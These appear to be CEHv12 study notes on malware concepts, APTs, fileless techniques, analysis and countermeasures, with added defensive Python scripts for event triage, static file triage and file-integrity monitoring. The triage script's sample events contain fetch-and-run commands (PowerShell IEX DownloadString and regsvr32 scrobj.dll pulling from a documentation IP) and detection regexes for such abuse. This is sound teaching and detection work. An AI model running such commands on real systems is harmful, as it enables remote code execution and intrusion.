CEHv12-07 - Malware

Malware concepts and components

Short for “malicious software.” It refers to any software that performs harmful actions on a computer system or network. It can take various forms, and while all viruses are malware, not all malware are viruses.

  • Common types:

    • Trojan: appears innocuous or even useful but carries hidden malicious code (the notes' analogy: a Tootsie Pop with smallpox inside).
    • Virus: malicious code that attaches itself to a host file or program and spreads when a user runs or shares the infected host (e.g., email attachments, USB drives); it needs human action to propagate.
    • Worm: like a virus, but self-propagating without human interaction, typically by exploiting a network-reachable vulnerability such as a remote code execution (RCE) flaw.
    • Ransomware: encrypts a victim’s data and demands payment (often in Bitcoin) for the decryption key. Example: WannaCry.
    • Adware: displays unwanted advertisements and often collects data on browsing habits. Not always strictly malicious, but intrusive and a common bundle-ware vector.
    • Spyware: collects information about users without consent: browsing habits for advertising, but also keystrokes, credentials and screen contents.
  • Components:

    • Downloader: a small first-stage program, often innocuous-looking on its own, whose only job is to fetch the real malicious payload from the internet.
    • Dropper: contains malicious code and installs malware onto the target system.
    • Obfuscator: makes the malware code unreadable to prevent detection by security systems.
    • Cryptor: encrypts malware code to prevent analysis; the code must be decrypted to understand its function.
    • Payload: actual malicious action the malware carries out (e.g., encrypting files, exfiltrating data).
    • Exploit: code that abuses a known vulnerability so the malware can gain execution or spread (e.g., EternalBlue, the SMBv1 exploit used by WannaCry).
  • Propagation methods:

    1. Email Attachments: A common way for malware to spread is via malicious email attachments or links.
    2. Software Installations from Untrusted Sources: Downloading software from torrents or other untrusted sources can lead to malware infections.
    3. Exploiting Software Vulnerabilities: Malware can use known vulnerabilities in software to spread automatically (e.g., EternalBlue in WannaCry).
  • Real-world examples

    • Ransomware: targets industries like healthcare and education. The shift from encrypting files to exfiltrating data and threatening to release it on the dark web is becoming more common.
    • Famous malware and actors: BlackEnergy, CryptoLocker, and the Equation Group (a threat actor rather than a single malware family). The GitHub repository theZoo hosts real-world malware samples for analysis (e.g., Petya, WannaCry, and samples attributed to groups such as Fancy Bear).

APT

Advanced Persistent Threats (APTs) are sophisticated, long-running intrusion campaigns run by well-organized, highly skilled groups with specific objectives such as data exfiltration, espionage, or financial gain. They often rely on tooling built for the campaign, including custom malware and zero-day exploits. Many APT groups are state-sponsored. Note that the term describes the actor and its campaign, not a piece of malware: Stuxnet, for example, is state-sponsored malware attributed to such a campaign, but the worm itself is not “an APT.”

  • Key characteristics:

    • Advanced: high-level skills and custom exploits are often used.
    • Persistent: they maintain long-term access to the target systems and keep coming back after partial cleanup.
    • Threat: a capable, intentional adversary with both the means and the motive to cause harm; the activity is deliberate and goal-directed, not opportunistic, and is carried out with detection avoidance in mind.
  • Groups: see MITRE APT Groups.

    • APT28 (Fancy Bear): Russian state-sponsored group, attributed to the GRU.
    • Lazarus Group: North Korean state-sponsored group; APT38 is its financially motivated arm (bank heists, cryptocurrency theft).
    • Lapsus$: non-state extortion group, notable for its 2022 breaches of companies such as Okta and Nvidia.
  • Targets:

    • Sensitive Information: personal or state secrets, intellectual property, and financial data.
    • Corporate Espionage: stealing research and development information to gain a competitive advantage.
    • Political Goals: activists may engage in politically motivated attacks.
  • Behavior:

    • Long-Term Access: APTs aim to stay undetected for as long as possible, often going unnoticed until they strike.
    • Patience: Attackers are methodical and patient, gathering intelligence over time before launching their attack.
    • High Skill Level: attackers are highly skilled in areas such as zero-day exploit development, evading detection, and using multi-stage attacks.
  • Lifecycle:

    1. Preparation:
      • Target Selection: choosing the victim and gathering intelligence on its people, systems and defenses.
      • Tool Creation: developing custom malware and testing against security defenses (EDRs, AV).
    2. Initial Intrusion: deploying malware and establishing a connection to the target system.
    3. Expansion: gaining further access by acquiring credentials and expanding across the network.
    4. Persistence: maintaining long-term access through various persistence techniques.
    5. Exfiltration: gathering and transferring sensitive information to external systems controlled by the attackers.
    6. Cleanup: covering tracks by erasing log files and removing evidence of the intrusion.

Trojans

  • Definition: type of malware that masquerades as legitimate software but contains a malicious payload. The name is derived from the Greek myth of the Trojan Horse, where enemies hid inside to infiltrate the city. In the case of Trojans, the “horse” is digital.

    • Function: Malicious software disguised as a legitimate program to trick users into installing it.
    • Propagation: Does not self-replicate; relies on social engineering to spread.
  • Design: there are different types of malicious software designed to install other malware on a target system. Here’s a brief explanation of the differences between them:

    • Dropper:
      • Function: a dropper is a type of malware designed to install another malicious payload on the victim’s system. It typically carries the malicious payload within its own code.
      • Operation: once executed, the dropper extracts and installs the payload directly onto the system.
      • Payload Delivery: the payload is usually embedded within the dropper itself, making it a self-contained malware delivery mechanism.
    • Downloader:
      • Function: A downloader is a type of malware that, upon execution, retrieves additional malicious software from the internet or another network location.
      • Operation: The downloader contacts a remote server to download the additional malware, which it then installs on the system.
      • Payload Delivery: Unlike droppers, downloaders do not contain the malicious payload initially; they fetch it from an external source after being executed.
    • Cryptors: tools or components used to encrypt malicious payloads. The primary purpose of a cryptor is to obfuscate malware to evade detection by antivirus software and other security mechanisms. Cryptors work by transforming the code of the malware into a format that is not recognizable by signature-based detection methods. Once the encrypted payload reaches the target system, the cryptor decrypts it, allowing the malware to execute.
    • Key differences between droppers and downloaders:
      • Embedded Payload: droppers carry the payload within themselves, while downloaders fetch it from an external location.
      • Network Activity: downloaders require network access to retrieve the second stage, whereas droppers do not necessarily need any network access to deliver theirs.
  • Types:

    • Remote Access Trojans (RATs).
    • Mobile trojans.
    • IoT botnet trojans.
    • Banking trojans.
    • Denial of Service trojans.
    • Backdoor trojans.
  • Purpose: trojans are used for a variety of malicious activities, including:

    • Disabling Firewalls/IDS to gain deeper access.
    • Installing More Malware as a prelude to further attacks like ransomware.
    • Establishing Command and Control (C2) communications for remote control.
    • Spying via keystroke logging, camera/audio hijacking, and browsing monitoring.
    • Blackmail/Extortion based on sensitive activities.
    • Storage Theft by using a victim’s device to store malicious data.
    • Destruction via “wipers” that erase data or disable the system.
    • Denial of Service (DoS) attacks or botnet creation.
    • Theft of sensitive data (PII, PHI, financials).
  • Deploy methods:

    • Dropper: first-stage component that looks benign and carries the real payload inside itself, writing it to disk and executing it.
    • Downloader: first-stage component that fetches the second-stage Trojan from a remote source.
    • Wrapper: binds the Trojan to a legitimate-looking application so that both run when the user launches it.
    • Cryptor: encrypts the malicious code to evade signature-based antivirus detection; a small stub decrypts and executes it at runtime.
  • Infection methods: trojans are often spread through social engineering tactics, such as:

    • Malicious Links: Emails or websites that trick users into clicking a link or downloading an attachment.
    • Macros: Embedded in documents that, when opened, execute the malicious code.
    • Fake Software: Promises of free software that instead install a Trojan (e.g., fake media player or games).

Viruses and worms

  • Concepts:

    • Virus: malicious software that attaches itself to a host file or program. It is self-replicating but requires human interaction (e.g., clicking on a file) to activate. Once activated, it spreads to other files.
    • Worm: self-replicating malware that spreads independently through software vulnerabilities without requiring human interaction.
  • Goals:

    • Destruction of systems.
    • Cyber theft.
    • Hacktivism.
    • Chaos or “watching the world burn”.
  • Symptoms of infection

    • Poor system performance (e.g., high CPU usage, disk space depletion).
    • Random system crashes.
    • Missing data or deleted files (e.g., documents).
  • Lifecycle:

    1. Design: Virus developers design and build new viruses.
    2. Replication: The virus spreads to new files or systems.
    3. Launch: The virus is executed when a user runs the infected file.
    4. Detection: Security teams discover and analyze the virus.
    5. Incorporation: Antivirus software updates to detect and protect against the new virus.
    6. Execution of the Damage Routine: the virus’s payload fires on hosts that are still infected; with the updated antivirus from the previous stage, users detect and remove it (CEH lists this as the final, elimination, stage).
  • Common types:

    • Boot Sector Viruses: Infect boot sectors of disks. Example: “Elk Cloner.”
    • File-Level Viruses: Spread through infected files. Example: Attachments or programs that carry viruses.
    • Macro Viruses: Exploit application macros (e.g., Excel, Word) to run malicious code.
  • Advanced types:

    • Polymorphic Viruses: encrypt their body with a varying key and mutate the decryptor, so the signature changes from copy to copy and simple signature matching fails.
    • Metamorphic Viruses: rewrite their own code on each infection, changing structure and instructions while preserving behavior.
    • Logic Bombs: malicious code that stays dormant until a specific event, date or condition triggers it.
    • Ransomware: a payload (delivered by a Trojan, worm or virus) that encrypts files and demands payment for the decryption key.

Fileless malware

In simple terms: the malicious code is loaded and executed directly in memory (RAM) and is never written to disk as a file.

  • Characteristics:

    • No Files on Disk: Operates without leaving files on the hard drive.
    • Memory-Resident: Persists in the system’s RAM.
    • Leverages Legitimate Tools: Uses built-in system tools like PowerShell, WMI (Windows Management Instrumentation), and macros within Office documents.
    • Evades Detection: Bypasses traditional antivirus solutions that scan for malicious files on disk.
  • Attack vectors:

    1. Phishing emails: contain malicious links or attachments that, when opened, execute fileless malware.
    2. Exploiting vulnerabilities: utilizes security flaws in software to execute code directly in memory.
    3. Malicious Macros: embedded in documents (e.g., Word or Excel) that execute scripts when the document is opened.
    4. PowerShell Scripts: PowerShell commands or scripts executed to perform malicious activities.
  • Entry Points for Fileless Malware:

    • Exploits: File-based or fileless payloads.
    • Network-Based: Exploiting remote vulnerabilities (e.g., buffer overflow).
    • Hardware: Malware targeting firmware of devices.
    • Execution and Injection:
      • File-based: Executables used in memory.
      • Macro-based: VBA macros, often in Word/Excel files.
      • Script-based: PowerShell, Bash, Python, etc.
      • Disk-based: Rootkit infections through boot records.
  • Process of infection:

    1. Entry Point: Exploits like EternalBlue, phishing emails, or malicious websites.
    2. Code Execution: Uses scripts (e.g., PowerShell, WMIC) to execute malicious actions.
    3. Persistence: Maintains access via registry entries or scheduled tasks.
    4. Objectives: Data exfiltration, reconnaissance, or cyber espionage.
  • Common tactics: attackers often obfuscate their code by modifying characters or using legitimate processes to avoid detection by security systems. This approach enables fileless malware to execute without leaving traces on disk, making it difficult for traditional security solutions to detect.

  • Classification:

    • By evidence:
      • No file activity performed.
      • Indirect file activity: legitimate files that are expected on the system are modified so that they launch malicious code, which still runs only in memory.
      • Files required: a file is needed, but it is not itself malicious and raises no red flags; it reaches out to the internet, grabs a malicious file and reads its content straight into memory, so nothing malicious touches the disk.
    • By Entry Points:
      • Exploits & Network-based.
      • Hardware: eg. Spreading through infected USB drives.
      • Execution & Injection (macro based, script based, disk based).
  • Types: fileless malware can be categorized based on the techniques it employs and the components it targets:

    1. Memory-Resident Malware: operates entirely in memory without writing files to the disk (e.g. worms that propagate through network connections and remain in the RAM of infected systems).
    2. Script-Based Malware: uses scripts (e.g., PowerShell, JavaScript, VBScript) to execute malicious activities.
    3. Registry-Resident Malware: stores malicious code or scripts in the Windows Registry for persistence (e.g., a base64-encoded PowerShell command kept in a registry value and launched at logon through a trusted binary such as rundll32.exe or regsvr32.exe).
    4. Reflective DLL Injection: a loader maps a Dynamic Link Library (DLL) into a running process straight from memory, without LoadLibrary and without the DLL ever existing on disk.
    5. Living off the Land (LoL) Attacks: exploits legitimate system tools and software to carry out malicious activities (e.g. using wmic.exe, powershell.exe, or mshta.exe to download and execute malicious scripts).
    6. Office Document Macros: embeds malicious macros in Office documents (e.g., Word, Excel) that execute when the document is opened (e.g. Word document with a malicious VBA macro that executes PowerShell commands).
    7. Bootkits: reside in the system’s boot sector or bootloader, often leveraging firmware or system-level exploits (e.g. infect the Master Boot Record (MBR) to load its payload directly into memory during the boot process).
    8. Browser-Based Fileless Malware: executes through web browsers using malicious scripts or exploits delivered via websites (e.g. JavaScript payload).
  • Examples

    1. Poweliks: uses registry keys to store and execute malicious PowerShell scripts.
    2. SamSam: ransomware that exploited vulnerabilities to run in memory and encrypt files.
    3. Kovter: ad-fraud malware that maintains persistence through registry manipulation.
    4. Powersniff: uses malicious PowerShell scripts to download and execute payloads directly in memory.
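Most of the fileless techniques listed above (LOLBins, script-based execution, macro-spawned script hosts, base64-encoded PowerShell) leave a trace in process-creation telemetry even when nothing touches disk. The script below is an added example, not part of the CEH notes or any vendor product: it triages constructed process-creation events in a hypothetical flattened form “ParentImage> Image CommandLine” (Sysmon Event ID 1 or an EDR feed would supply the same fields), flags LOLBin use, Office-to-script-host parent/child chains, and decodes -EncodedCommand arguments (which PowerShell expects as base64 of UTF-16LE text) so that the suspicious tokens inside the encoded script are scanned too. The image paths are assumed to contain no spaces; the IP address is a documentation address.

```python
"""Triage process-creation events for fileless-malware indicators (added example)."""
import base64
import re

# Signed Windows binaries commonly abused to run code without dropping a file (LOLBins).
LOLBINS = {"powershell.exe", "pwsh.exe", "wmic.exe", "mshta.exe", "regsvr32.exe",
           "rundll32.exe", "cscript.exe", "wscript.exe", "certutil.exe", "bitsadmin.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Command-line fragments that usually mean "fetch or execute code in memory".
TOKEN_RE = re.compile("|".join([
    r"-enc(odedcommand)?\b", r"-nop\b", r"-w(indowstyle)?\s+hidden",
    r"downloadstring", r"\biex\b", r"invoke-expression", r"frombase64string",
    r"scrobj\.dll", r"/i:https?://", r"javascript:", r"process\s+call\s+create",
]), re.IGNORECASE)
# powershell -enc / -EncodedCommand takes base64 of the UTF-16LE script text.
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def parse_event(line: str):
    """Split the hypothetical 'ParentImage> Image CommandLine' record (assumed format)."""
    parent, _, rest = line.partition("> ")
    image, _, cmdline = rest.partition(" ")
    basename = lambda p: p.rsplit("\\", 1)[-1].lower()
    return basename(parent), basename(image), cmdline.strip()


def decode_encoded_command(cmdline: str):
    """Return (base64_blob, decoded_script) for an -EncodedCommand argument, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    try:
        return blob, base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a real encoded command (bad alphabet, padding or odd length)


def score_event(line: str) -> list:
    """Return sorted indicator labels for one event; empty list means nothing notable."""
    parent, image, cmdline = parse_event(line)
    findings = set()
    if image in LOLBINS:
        findings.add(f"lolbin:{image}")
        if parent in OFFICE_APPS:
            findings.add("office-parent")  # classic macro -> script host chain
    scan_text = cmdline
    enc = decode_encoded_command(cmdline)
    if enc is not None:
        blob, decoded = enc
        findings.add("encoded-command")
        # Scan the decoded script instead of the opaque base64 blob.
        scan_text = cmdline.replace(blob, "") + " " + decoded
    for m in TOKEN_RE.finditer(scan_text):
        findings.add("token:" + re.sub(r"\s+", " ", m.group(0).lower()))
    return sorted(findings)


def triage(events) -> dict:
    """Map event index -> findings for every event that raised at least one indicator."""
    return {i: f for i, line in enumerate(events) if (f := score_event(line))}


# --- constructed sample events (not captured from a real host) ---
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    "C:\\Windows\\explorer.exe> C:\\Windows\\System32\\notepad.exe notepad.exe C:\\Users\\bob\\notes.txt",
    "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE> "
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell.exe -nop -w hidden -enc " + ENCODED,
    "C:\\Windows\\System32\\cmd.exe> C:\\Windows\\System32\\regsvr32.exe regsvr32 /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll",
]

if __name__ == "__main__":
    for i, findings in triage(SAMPLE_EVENTS).items():
        print(f"event {i}: {', '.join(findings)}")
```

The encoded-command decoder is the part worth keeping: signature engines that only look at the raw command line never see the IEX/DownloadString inside the blob, which is exactly why attackers encode it.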

Malware analysis

  • Phases:

    • Discovery phase:
      1. Initial Detection: malware discovery may be triggered by antivirus (AV), endpoint detection and response (EDR) systems, or user reports of suspicious activity.
      2. Indicators of Infection:
        • Files with strange behavior (e.g., ransomware locking files).
        • AV or IDS/IPS systems detecting unusual activities like command and control (C2) connections.
        • User complaints such as unexpected system behavior or ransom notes.
      3. Sheep Dipping:
        • Running suspect files and removable media through a dedicated, isolated “sheep-dip” machine loaded with AV and monitoring tools before they are allowed to touch production systems; the name comes from dipping sheep to remove parasites before they rejoin the flock.
        • AV scans plus network traffic analysis on that machine are used to check for suspicious activity.
        • Quarantined devices undergo the same thorough analysis before being allowed back onto the network.
    • Study/Analysis phase:
      1. Static Analysis: this involves analyzing the file without executing it:
        • File Hashing: files are hashed (e.g., with md5sum or sha256sum) and the hashes looked up in known-malware databases such as VirusTotal, which avoids uploading a possibly sensitive sample.
        • File Type Identification: tools like file identify the format from its magic bytes rather than its extension (e.g., ELF for Linux, PE for Windows).
        • Suspicious Strings: searching for human-readable strings within the binary (e.g., /bin/sh suggesting a spawned shell, URLs or IP addresses suggesting C2, Windows API names such as CreateRemoteThread suggesting injection).
        • Obfuscation Detection: malware often obfuscates its code to avoid detection by AV systems.
      2. Dynamic Analysis: involves running the malware to observe its behavior:
        • File System Behavior: what files does it create or modify? Does it delete files or consume system resources (e.g., CPU, memory)?
        • Network Activity: monitoring for any network traffic indicating command and control (C2) communication or data exfiltration.
        • System Calls: tools like strace trace the system calls the malware makes and show which resources it requests from the operating system.
  • Tools:

    • VirusTotal: popular service for scanning files, or just their hashes, against multiple antivirus engines.
    • Hybrid Analysis: similar to VirusTotal, also offering sandbox reports on file behavior.
    • strace: tracks system calls during dynamic analysis to see which resources are being accessed (Linux; Process Monitor plays a similar role on Windows).
    • IDA Pro/Ghidra: disassemblers and decompilers used for deeper reverse engineering of malware code.
  • Important concepts:

    • Obfuscation: malware may use techniques like Base64 encoding or PowerShell obfuscation to avoid detection, so strings and command lines often need to be decoded before they can be assessed.
    • Sandboxing: running malware in an isolated environment is essential to prevent it from affecting real systems. Use either physical isolation or virtualization, with networking disabled or routed through a controlled sink, to safely analyze potentially dangerous files.
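The static-analysis steps above (hashing, file-type identification, suspicious strings) are simple enough to script. The following is an added example, not part of the CEH notes or of any tool the notes mention: a pure-Python first-pass triage that computes MD5 and SHA-256, identifies the container from magic bytes the way file does (including the PE check through e_lfanew), extracts both ASCII and UTF-16LE strings (Windows binaries often keep registry paths and URLs as wide strings, which a plain ASCII strings run misses), and groups string hits into indicator categories. The two samples at the bottom are constructed byte strings, not real malware; the IP address is a documentation address.

```python
"""Static triage of a suspect file: hashes, type identification, strings (added example)."""
import hashlib
import re
import struct

ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")          # printable ASCII runs
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")    # UTF-16LE runs, common in Windows binaries

# Categories of strings worth a second look; a hit is a lead, not a verdict.
INDICATORS = {
    "shell": re.compile(r"/bin/(?:ba)?sh|cmd\.exe|powershell", re.I),
    "network": re.compile(r"https?://|\b\d{1,3}(?:\.\d{1,3}){3}\b", re.I),
    "injection-api": re.compile(r"VirtualAllocEx|WriteProcessMemory|CreateRemoteThread|NtMapViewOfSection"),
    "persistence": re.compile(r"CurrentVersion\\Run|/etc/rc\.local|crontab|schtasks", re.I),
    "anti-analysis": re.compile(r"IsDebuggerPresent|ptrace|vmware|vbox", re.I),
}


def hashes(data: bytes) -> dict:
    """MD5 for legacy lookups, SHA-256 for anything you record or share."""
    return {"md5": hashlib.md5(data).hexdigest(), "sha256": hashlib.sha256(data).hexdigest()}


def identify(data: bytes) -> str:
    """Minimal `file`: identify the container format from its magic bytes."""
    if data[:4] == b"\x7fELF":
        return "ELF"
    if data[:2] == b"MZ":
        if len(data) >= 0x40:
            (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # offset of the NT headers
            if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
                return "PE"
        return "MZ (no valid PE header)"
    if data[:4] == b"%PDF":
        return "PDF"
    if data[:4] == b"PK\x03\x04":
        return "ZIP (also OOXML Office, JAR, APK)"
    if data[:4] == b"\xd0\xcf\x11\xe0":
        return "OLE2 (legacy Office; may carry VBA macros)"
    return "unknown"


def extract_strings(data: bytes) -> list:
    """ASCII strings first, then UTF-16LE strings decoded to text."""
    ascii_strings = [m.group(0).decode("ascii") for m in ASCII_RE.finditer(data)]
    wide_strings = [m.group(0).decode("utf-16-le") for m in WIDE_RE.finditer(data)]
    return ascii_strings + wide_strings


def flag_strings(strings) -> dict:
    """Group strings by the indicator category they match."""
    hits = {}
    for s in strings:
        for category, pattern in INDICATORS.items():
            if pattern.search(s):
                hits.setdefault(category, set()).add(s)
    return {k: sorted(v) for k, v in sorted(hits.items())}


def triage_bytes(data: bytes, name: str = "sample") -> dict:
    strings = extract_strings(data)
    return {"name": name, "size": len(data), "type": identify(data), "hashes": hashes(data),
            "string_count": len(strings), "indicators": flag_strings(strings)}


# --- constructed samples (not real malware) ---
ELF_SAMPLE = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 57                     # 64-byte ELF header, fields zeroed
    + b"/bin/sh\x00-c\x00ptrace\x00198.51.100.7\x00/etc/rc.local\x00"
)
PE_SAMPLE = (
    b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x80)              # DOS header, e_lfanew -> 0x80
    + b"\x00" * 0x40 + b"PE\x00\x00" + b"\x00" * 16              # NT signature at 0x80
    + b"kernel32.dll\x00VirtualAllocEx\x00WriteProcessMemory\x00CreateRemoteThread\x00"
    + b"IsDebuggerPresent\x00cmd.exe /c powershell -nop -enc\x00http://198.51.100.7/stage2.bin\x00"
    + b"\x00"                                                    # pad so the wide string starts cleanly
    + "Software\\Microsoft\\Windows\\CurrentVersion\\Run".encode("utf-16-le") + b"\x00\x00"
)

if __name__ == "__main__":
    for name, data in (("sample.elf", ELF_SAMPLE), ("sample.exe", PE_SAMPLE)):
        report = triage_bytes(data, name)
        print(f"{name}: {report['type']}, sha256={report['hashes']['sha256']}")
        for category, items in report["indicators"].items():
            print(f"  [{category}] " + "; ".join(items))
```

Run it on a real sample only inside the sandbox described above, and submit the SHA-256 rather than the file to VirusTotal first; a hash lookup leaks nothing about the sample, an upload may.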

Malware countermeasures

  1. Updates and Patches:
    • Keeping software and systems updated is crucial to defend against malware, as malware often exploits known vulnerabilities.
    • Establish a patch policy with scheduled updates. Neglecting updates increases vulnerability to attacks.
    • Automatic updates can help ensure systems stay secure.
  2. Anti-malware Tools:
    • Use anti-virus, anti-malware, and EDR (Endpoint Detection and Response) solutions to detect and block malicious activity.
    • Windows Security is a built-in tool for virus and threat protection. Ensure real-time protection and regular updates.
  3. User Awareness and Training:
    • Train employees to avoid phishing emails, suspicious links, and unknown attachments. User behavior is a major vector for malware infection.
    • Implement security awareness sessions to help employees identify and handle threats.
  4. Backups:
    • Regular backups are essential to recover from data loss or ransomware attacks.
    • Implement a defined backup schedule, including offsite backups and remote replication.
  5. Logging and Monitoring:
    • Monitor systems using IDS/IPS, file integrity monitors, and network traffic analysis tools (e.g., Wireshark, SolarWinds).
    • Use SIEM systems (e.g., Splunk, AlienVault) to aggregate and analyze logs, enabling quick detection of security incidents.
  6. Blocking Malicious Activity:
    • Block untrusted applications and network connections using allow/deny lists or firewall rules.
    • Reduce the attack surface: disable unnecessary services and restrict tooling that is commonly abused (e.g., block or constrain PowerShell through application control or Constrained Language Mode on hosts that do not need it, and enable script block logging where it stays enabled).
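The “file integrity monitors” mentioned under logging and monitoring are conceptually simple, and seeing one in a few lines makes the countermeasure concrete. The following is an added example, not part of the CEH notes or of any product: it records a fingerprint (SHA-256, size, permission bits) for every file under a root, persists it as JSON, and later diffs the live tree against it, reporting added, removed and modified paths. The demo builds a small tree in a temporary directory and then tampers with it the way the lifecycle above describes (trojanised binary, setuid-style permission change, edited hosts file, wiped log, cron persistence); all names in it are illustrative.

```python
"""Minimal file-integrity monitor: baseline, persist, compare (added example)."""
import hashlib
import json
import os
import tempfile
from pathlib import Path


def fingerprint(path: Path) -> dict:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):  # stream; binaries can be large
            h.update(chunk)
    st = path.stat()
    # Mode matters as much as content: a new setuid bit or +x is a change even if bytes match.
    return {"sha256": h.hexdigest(), "size": st.st_size, "mode": oct(st.st_mode & 0o7777)}


def build_baseline(root: Path) -> dict:
    return {p.relative_to(root).as_posix(): fingerprint(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def save_baseline(baseline: dict, dest: Path) -> None:
    # Keep the baseline off-host or on read-only media: an attacker with root
    # can otherwise simply rewrite it after tampering.
    dest.write_text(json.dumps(baseline, indent=1, sort_keys=True))


def load_baseline(src: Path) -> dict:
    return json.loads(src.read_text())


def compare(baseline: dict, current: dict) -> dict:
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in set(baseline) & set(current) if baseline[k] != current[k]),
    }


def demo() -> dict:
    """Build a tree, baseline it, tamper with it the way malware would, then diff."""
    with tempfile.TemporaryDirectory() as tmp, tempfile.TemporaryDirectory() as store:
        root = Path(tmp)
        for rel, content in {                      # constructed "system" files
            "bin/sshd": b"original sshd bytes",
            "bin/id": b"original id bytes",
            "etc/hosts": b"127.0.0.1 localhost\n",
            "var/log/auth.log": b"Accepted publickey for bob\n",
        }.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_bytes(content)
        baseline_file = Path(store) / "baseline.json"   # stored outside the monitored root
        save_baseline(build_baseline(root), baseline_file)

        # Simulated intrusion.
        (root / "bin/sshd").write_bytes(b"original sshd bytes" + b"\x90" * 16)   # trojanised binary
        os.chmod(root / "bin/id", 0o755)                                          # permission change only
        with (root / "etc/hosts").open("ab") as f:
            f.write(b"198.51.100.7 update.vendor.example\n")                      # hijack update host
        (root / "var/log/auth.log").unlink()                                      # log wiped (cleanup stage)
        (root / "etc/cron.d").mkdir()
        (root / "etc/cron.d/backdoor").write_bytes(b"* * * * * root /tmp/.x\n")  # persistence

        return compare(load_baseline(baseline_file), build_baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9s} {', '.join(paths) or '-'}")
```

Real deployments (AIDE, Tripwire, Wazuh and the like) add a scope of what to watch, scheduling and alert routing, but the detection core is exactly this diff; the two decisions that matter operationally are fingerprinting metadata as well as content and keeping the baseline where the host cannot alter it.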